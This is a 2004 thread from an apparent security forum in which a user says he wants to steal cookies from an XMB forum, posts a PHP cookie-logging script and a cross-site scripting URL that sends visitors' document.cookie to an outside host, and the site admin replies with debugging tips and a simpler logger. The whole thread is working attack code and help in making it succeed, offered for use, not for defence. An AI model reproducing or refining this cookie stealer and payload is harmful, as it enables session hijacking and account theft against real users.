|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 47
Members: 0
Total: 47
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XMB XSS help |
|
Posted: Thu Sep 16, 2004 2:53 am |
|
|
morrowasted |
Regular user |
|
|
Joined: Sep 06, 2004 |
Posts: 10 |
|
|
|
|
|
|
|
Okay, so I want to steal some cookies from an XMB forum. I've written a PHP script:
Code: |
<?
$cook = $_GET['var'];
$wow = fopen("log.txt", 'r');
$w00t = fread($wow, filesize("log.txt"));
echo $w00t;
fclose($wow);
$neat = fopen("log.txt", 'w');
$var586 = $w00t . "\n\n" . $cook;
$cool = fwrite($neat, $var586);
fclose($neat);
?>
|
Which seems to be working fine. The problem I'm having is crafting a workable URL. I tried http://host.com/post.php?action=newthread&fid=2&message="></textarea><script>document.location='http://www.bellaire.org/stuff/cookie.php?var='%20+document.cookie;</script>
but that didn't work, it simply displayed a blank page.
Anyone know how I can do this? |
|
_________________ I'm new to all this, sorry for my dumbness. |
|
|
|
|
|
|
|
Posted: Sun Sep 19, 2004 8:39 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
There can be many reasons to exploit failure. Like patched version of
the XMB forum. And "body onload" will not work on all browsers.
So first step is to look at "html source" at the html page, where you
trigger exploit. Look at code near the critical point and see, is there
html code with right syntax or you must modify exploit to be working.
By the way, your code can be more simple:
Code: |
$cook = $_GET['var'];
if(!empty($cook))
{
$fh = fopen('log.txt','ab');
fwrite($fh,$cook."\n\n");
fclose($fh);
}
|
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|